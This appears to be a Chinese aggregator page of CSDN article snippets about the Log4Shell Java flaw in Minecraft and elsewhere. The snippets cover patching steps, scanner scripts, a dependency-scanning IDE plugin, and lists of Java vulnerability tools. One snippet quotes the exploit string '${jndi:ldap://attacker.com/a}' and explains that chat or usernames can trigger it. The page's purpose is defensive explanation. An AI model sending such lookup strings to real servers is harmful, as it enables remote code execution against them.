精华内容
下载资源
问答
  • 立即修补您的 Minecraft 服务器以避免巨大的 Java 漏洞
    千次阅读
    2021-12-11 21:06:47

    在这里插入图片描述
    有一个名为Log4Shell的巨大 Java 漏洞,世界各地的公司都在周五下午疯狂地致力于修复,而 Minecraft 是众多使用 Java 的易受攻击程序之一。

    具体的漏洞在log4j的,由各种应用和服务在互联网,包括服务器的Minecraft,蒸汽和iCloud中使用的开源日志库中发现,根据LunaSec。

    著名安全研究员 Marcus Hutchins表示,“数以百万计的应用程序使用 Log4j 进行日志记录,而攻击者所需要做的就是让应用程序记录一个特殊的字符串。”

    在Minecraft的情况下,攻击者已经在积极使用该漏洞,并且多个服务器已经下线。攻击者只需发布聊天消息即可触发漏洞。根据 Minecraft 的团队的说法,“此漏洞可能会导致您的计算机遭到入侵。”

    如果您运行 Minecraft 服务器,游戏的官方网站会列出您需要采取的步骤,以确保您的服务器安全。

    log4j 库的更新已经发布,但是有大量的应用程序和使用 Java 的人,每个人都需要时间才能获得更新。这个漏洞很危险,因为它很容易被利用。与往常一样,请确保您计算机上的所有内容都已更新,以保护您免受此类威胁和其他威胁。

    更多相关内容
  • 本仓库仅为JAVA漏洞复现以及安全测试研究,禁止通过该项目发起网络攻击,如被发现后果自负。 仓库代码 项目代码 CVE编号 说明 Oracle Coherence存在MVEL表达式注入漏洞,受此漏洞影响的版本包括3.7.1.0、12.1.3.0.0...
  • java漏洞汇总.docx

    2019-08-19 15:15:54
    java漏洞汇总,ackson是一套开源的java序列化与反序列化工具框架,可将java对象序列化为xml和json格式的字符串并提供对应的反序列化过程。由于其解析效率较高,Jackson目前是Spring MVC中内置使用的解析方式
  • JAVA漏洞扫描工具之墨菲安全for IDEA

    千次阅读 2022-02-16 22:44:54
    最近log4j漏洞猖狂,某天一个好心网友提交了一份分析报告,指出开源软有问题墨菲漏洞扫描报告forSpringBootCodeGenerator ,当时马上就更新所有依赖到最新版本。事后觉得这个工具挺有意思,他基于面向java,基于...

    背景

    最近log4j漏洞猖狂,某天一个好心网友提交了一份分析报告,指出开源软有问题墨菲漏洞扫描报告forSpringBootCodeGenerator
    ,当时马上就更新所有依赖到最新版本。事后觉得这个工具挺有意思,他基于面向java,基于github和idea,方式多样,深得在下喜欢,所以分享一下使用心得。by zhengkai.blog.csdn.net
    在这里插入图片描述
    需要注意的是github项目必须是java语言为主才行,如果过多javascript等其他文件导致识别不准则还是无法使用=。=我的项目就是这样。。。

    输入邀请码a0d5af免费使用

    官网

    https://www.murphysec.com/j?invite_code=a0d5af
    注册墨菲安全
    墨菲安全文档
    IDEA插件使用说明
    Github使用说明

    漏洞报告

    报告overview:
    在这里插入图片描述
    已修复版本:
    在这里插入图片描述
    未修复版本:
    在这里插入图片描述

    安装墨菲安全

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    扫描项目漏洞

    在这里插入图片描述
    像我修复了之后,就没有漏洞显示了。
    在这里插入图片描述
    有漏洞则如以下所示:
    在这里插入图片描述
    追加Surprise:被官方点赞了

    在这里插入图片描述

    展开全文
  • 一个包含web常见漏洞的maven 项目。JDK8 +springMVC+JDBC+mybatis+mysql。使用Eclipse导入maven项目,用sql创建数据库和表,修改数据库连接密码。即可运行。有兴趣的可以研究测试。
  • JAVA漏洞log4j | 我的世界遭黑客袭击

    千次阅读 2021-12-13 20:58:35
    我的世界java版服务端、客户端存在安全隐患。 漏洞利用log4j2在打印日志时会自动将形如${...}的文本替换为功能文本发送恶意链接。

    我的世界java版服务端、客户端存在安全隐患。

    漏洞利用log4j2在打印日志时会自动将形如${...}的文本替换为功能文本,以实现显示日期、java版本等参数。玩家在服务器中发言都会被打印到日志中,你可以在聊天框这么写:

    ${date:YY-MM-DD:hh:mm:ss}
    

    日志:

    21-12-13:21:00:00
    

    或:

    ${java:vm}
    

    日志:

    OpenJDK 64-Bit.....#吧啦吧啦
    #不同电脑不同
    

    这些功能是很强大的,而log4j2漏洞正是利用${jndi:ldap:<地址>}可以下载并执行代码的作用。攻击者首先搭建一个服务器,再在被攻击服务器上发送该信息,即可让服务器上的玩家通过日志执行恶意代码,如图:
    在这里插入图片描述
    【由于找不到hkm所以中断了】

    这是非常恐怖的事…

    更可怕的是,游戏中任何可以打印日志的地方都可以被利用,如在登录阶段如果玩家连接丢失就会打印一条“xxx(id) 连接丢失:balabala(原因)”,而这个游戏id是客户端发送给服务端的,所以攻击者只需要把上面所说到的那个字符串作为玩家id然后再故意在登录阶段断开连接就可以实现相同的攻击效果,而根本不需要登入服务器!所以白名单是没有用的!

    目前,包括Minecraft官启、PCL2、HMCL等多数官方或非官方的启动器都已启动紧急更新。Mojang官方已发布补丁。但网易我的世界暂时无反应(截至目前)
    处理方式:
    1.更新各启动器紧急更新版本:

    • PLC2:已发布紧急更新 2.2.7,更新到最新版并重启 MC 即可防御该漏洞。如果更新出现问题,请通过链接直接下载最新正式版。
    • BakaXL:已发布紧急更新,同样更新到最新版并重启 MC 即可。
    • HMCL:已发布紧急更新,同样更新到最新版并重启 MC 即可。
    • 其他启动器:请在启动器设置的 Java 虚拟机参数 一项中输入【注意:没有换行,直接复制】
    -XX:+UseG1GC -XX:-UseAdaptiveSizePolicy -XX:-OmitStackTraceInFastThrow -Dfml.ignoreInvalidMinecraftCertificates=True -Dfml.ignorePatchDiscrepancies=True -Dlog4j2.formatMsgNoLookups=true
    

    然后重启 MC,即可临时防御该漏洞。

    提示

    建议暂时关闭服务器,避免遭到攻击,然后参考该文章进行修复:



    另外,我的世界ver.1.18.1及较低版本小概率遭打击,但还是建议安装修复补丁。
    可以考虑访问链接下载修复mod,当然最好的还是官方补丁。




    Q&A

    Q:听说这个漏洞只影响服务端,我不开服是不是就不用管?
    A:不,它也会影响客户端。只要你进入了多人游戏,你就有可能受到攻击。

    Q:我如果不进服务器,还会被攻击吗?
    A:如果你只玩单人游戏,大概就不会被影响。

    Q:我的服务器是通过内网穿透开的,这会有影响吗?
    A:问题出在 MC 的服务端,和你的开服手段没有任何关系。

    Q:杀毒软件说最新版的 PCL2 是病毒?
    A:因为这个版本是紧急更新的,误报病毒的反馈还在处理中,目前你可以先给 PCL2 添加杀毒软件白名单。明天就不会报毒了。

    结语

    注意:不止Minecraft,所有建立在java上的联机游戏都有安全隐患,只是以MC为首罢了。(MinecraftPE不受影响)
    网络并非法外之地!遵纪守法从我做起!





    @HaohaoCppDebuger|寻兰 
    2021/12/13 

    -----THE END-----
    THANK YOU !












    本文部分参考资料:bilibili_DCS百度贴吧_我的世界吧

    展开全文
  • 在广泛使用的 Java 库中发现了一个关键漏洞,当服务器管理员争先恐后地修复它时,它扰乱了大部分互联网。易受攻击的组件log4j到处都用作包含的库,因此您需要检查服务器并确保它们已更新。 这个漏洞是如何工作的? ...

    在这里插入图片描述
    在广泛使用的 Java 库中发现了一个关键漏洞,当服务器管理员争先恐后地修复它时,它扰乱了大部分互联网。易受攻击的组件log4j到处都用作包含的库,因此您需要检查服务器并确保它们已更新。

    这个漏洞是如何工作的?

    就漏洞利用而言,漏洞log4j 是过去几年中最严重的漏洞 之一,在CVSS 量表上获得罕见的 10/10 得分,并将在未来多年困扰整个互联网。

    更糟糕的是,log4j 它不是一个应用程序——它是一个被许多其他应用程序使用的开源库。您可能没有直接安装它;它可能包含在其他.jar 文件中,或由其他应用程序作为依赖项安装。

    本质上,它允许攻击者向您的应用程序发送文本,如果它在某处记录它(例如,在 Web 服务器中记录用户控制的代理字符串),您的服务器将执行恶意代码。文本格式类似于以下示例:一个极其简单的字符串,其中包含指向远程地址的链接。

    ${jndi:ldap://attacker.com/a}
    

    中的易受攻击的组件log4j 是 Java 命名和目录接口,它允许日志框架发出远程请求。除了它还在该端点反序列化文件,并且能够加载.class 包含远程代码的文件。这是不好的。

    我易受攻击吗?

    该漏洞在log4j最新版本 2.16.0中很快得到了修补,但问题并没有修复它——而是找出您需要修复的地方。由于log4j 是嵌入式依赖项,因此在您的系统上搜索它的特定版本可能并非易事。而且,由于 Java 如此流行,许多第三方工具和组件可能会使用它,因此您甚至可能不 知道您的机器上是否正在运行 Java 软件。

    即使您认为自己不易受到攻击,您可能仍需要仔细检查. 此漏洞利用影响了如此多的系统,您很有可能在不知不觉中运行log4j Java 或 Java。

    幸运的是,JDK 版本大于 6u211、 7u201、 8u191、 并且 11.0.1 不受目前最常被利用的主要攻击媒介(使用 LDAP)的影响。无论如何,您仍然需要修补它,因为它也可以很容易地与其他攻击媒介一起使用。此外,仅向端点发出请求的简单行为就可以揭示有关网络上机器的数据,这也不是一件好事。

    这个漏洞凸显了为什么保留软件材料清单 (SBOM) 很重要,SBOM 基本上是系统上所有软件的列表,它来自哪里,以及它是由什么制成的。将来,这些知识可以帮助您快速修补此类攻击。

    目前,您可能只关心如何修补您的网络。为此,您需要扫描系统以查找log4j 软件使用的版本,并列出所有易受攻击的组件。

    扫描您的系统

    许多人已经编写了脚本来自动扫描系统中的漏洞安装,例如这个流行的用 Python 编写的脚本,以及这个来自安全公司 LunaSec 的脚本。最容易使用的一个是这个简单的 bash 脚本,它可以扫描您的包并识别log4j 版本,还可以告诉您您的系统是否甚至首先使用 Java。在大多数情况下,您需要使用不同的脚本运行多次扫描,因为不能保证其中任何一个在识别每个易受攻击的系统方面都 100% 有效。

    您可以下载它并使用一些命令运行它。这需要以 root 身份运行才能扫描您的整个系统,所以当然,请注意您在 Internet 上使用 root 权限运行哪些脚本。这也是任意代码执行。

    wget https://raw.githubusercontent.com/rubo77/log4j_checker_beta/main/log4j_checker_beta.sh -q
    chmod +x log4j_checker_beta.sh
    sudo ./log4j_checker_beta.sh
    

    这个脚本的结果突出了是什么让这个 log4j 漏洞如此可怕——在我的个人服务器上运行这个发现我很容易受到攻击,在零日之后的几天,尽管我认为我没有在这台机器上安装 Java 因为我’我没有运行任何我自己的 Java 软件。

    Elasticsearch 在这台机器的后台运行,它是用 Java 编写的。我不必手动安装 Java 来安装 Elasticsearch;它包含一个捆绑版本的 OpenJDK。它包含log4j 在此安装中并且容易受到攻击。

    在这里插入图片描述

    至少对于 Elasticsearch 而言,修复方法是更新所有软件包并遵循其缓解指南。您运行的任何软件都可能是这种情况;您需要log4j 直接更新、更新捆绑它的软件,或者使用其他人正在使用的任何最佳实践缓解措施对其进行修补。

    如果由于某种原因无法修补 jar,您可以使用这个 JVM 标志来缓解这个问题,它只是告诉log4j在格式化消息时不要进行任何查找。但是不建议这样做,您应该尝试在log4j 任何可以完全解决问题的地方安装 2.16.0。

    -Dlog4j2.formatMsgNoLookups=true
    
    展开全文
  • java web程序常见高危安全漏洞(如:SQL注入 、 XSS跨站脚本攻击、文件上传)的过滤和拦截处理,确保系统能够安全的运行
  • Java漏洞

    千次阅读 2022-01-28 09:52:05
    远程反序列化rce漏洞_深入理解 Java 反序列化漏洞_Respect yourself的博客-CSDN博客1.Java 序列化与反序列化Java序列化是指把Java对象转换为字节序列的过程便于保存在内存、文件、数据库中,ObjectOutputStream类的...
  • Struts2是用Java语言编写的一个基于MVC设计模式的Web应用框架 关于struts2漏洞,vulhub都有环境并且给出了漏洞原理和poc GitHub项目地址:https://github.com/vulhub/vulhub/tree/master/struts2 判断网站是否基于...
  • JAVA常用框架及漏洞

    千次阅读 2021-08-13 15:40:50
    三大语言常用框架及漏洞 Java框架 1.MyBatis 是支持定制化 SQL、存储过程以及高级映射的优秀的持久层框架,其主要就完成2件事情: 封装JDBC操作 利用反射打通Java类与SQL语句之间的相互转换 MyBatis的主要设计...
  • JWebScan,Java版网站漏洞扫描器
  • Java语言中常用的漏洞大汇总,建议收藏。
  • java 漏洞调试科普

    千次阅读 2012-05-09 14:02:51
    Java 漏洞调试科普 ...以cve2010-0840的Java Runtime Environment Trusted Methods Chaining Remote CodeExecution Vulnerability漏洞为例,介绍下如何调试java漏洞。   这个漏洞影响的java版本   Jre
  • 基于java环境漏洞利用

    千次阅读 2022-02-27 18:26:40
    基于java环境的漏洞利用获取shell前言二、操作步骤1.执行监听设置参数2.运行木马构建session总结 前言 一般基于Java的软件开发的电脑上,做财务,大数据,税控软件,收银,OA软件上都会有Java环境的搭建和配置可以...
  • Java代码审计漏洞挖掘(入门)

    千次阅读 2021-11-10 11:00:29
    课程结构: 星球是《Java代码安全审计(入门篇)》图书的配套讲解视频及技术解答,建立的根本性目的是“通过较详细的漏洞点剖析以及代码审计实战演示”帮助读者朋友能够入门Java代码审计,夯实Java代码审计的基本功...
  • JAVA常见漏洞及规避

    2020-08-20 14:47:06
    JAVA中,基本数据类型中,短整型为2个字节,整型为4个字节,长整型为8个字节,但是首位都为符号位,1为负,0为正。当计算产生进位到符号位时,数字会由整数变为负数,这种情况就叫做整型溢出,如: public class ...
  • 使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。... 体积更小,不再依赖java
  • 上传文件漏洞总结

    2018-01-10 10:05:56
    上传文件的总结上传文件的总结上传文件的总结上传文件的总结
  • 主要代码审计方法是跟踪用户输入数据和敏感函数参数回溯: 跟踪用户的输入数据,判断数据进入的每一个代码逻辑是否有可...大多数漏洞的产生是因为函数的使用不当导致的,只要找到这些函数,就能够快速挖掘想要的漏洞
  • 基于JAVA_Swing的图形化GUI漏洞扫描工具开发的编程思维,用java开发图形化漏洞扫描、漏扫工具,充分发挥java面向对象的编程思想。
  • Java反序列化漏洞的原理分析

    千次阅读 2021-02-12 09:19:13
    *本文原创作者:Moonlightos,本文属FreeBuf原创奖励计划,未经许可禁止转载世界上有三件事最难:把别人的钱装进自己的口袋里把自己的想法装进别人的脑袋里让自己的代码运行在别人的服务器上前言Java反序列化漏洞是...
  • Java漏洞被利用进行大规模攻击

    千次阅读 2013-05-22 10:45:26
    安全研究人员警告说,最近修补的Java远程执行代码漏洞已经被网络犯罪分子利用,通过恐吓软件进行大规模的攻击。  据国外媒体报道,一个标识为CVE-2013-2423的漏洞已经成为网络犯罪分子攻击的目标,而它正是甲骨文4...
  • Java路径遍历漏洞修复心得

    千次阅读 热门讨论 2021-02-01 17:54:46
    本文以JAVA 语言源代码为例,分析路径遍历缺陷及该缺陷产生的原因及修复方法。 二、缺陷代码 172行因为localFile因为接收参数后未对参数做合理校验,可能会收到../file.text,假定文件路径有效,则可能导致读取...
  • java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以
  • 0x01 背景JavaMelody是一款在生产和QA环境中对JAVA应用以及应用服务器(Tomcat、Jboss、Weblogic)进行监控的工具,可以通过...攻击者利用漏洞,可以读取JavaMelody服务器上的敏感信息。0x02 漏洞分析漏洞修复的com...
  • 最近在搞Java的后端项目,需要更新jar依赖包,找到了一个jar包漏洞检测的插件Dependency Check。 Dependency-Check是OWASP(Open WebApplication Security Project)的一个实用开源程序,用于识别项目依赖项并检查...
  • Java反序列化漏洞利用工具
  • 1.软件安全基础知识 2.Java语言软件安全漏洞 3.CC++语言的软件安全漏洞 4.dotNET语言软件安全漏洞
  • 从零开始学习软件漏洞挖掘系列教程

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 106,337
精华内容 42,534
关键字:

java漏洞

java 订阅
友情链接: TextureSearch.rar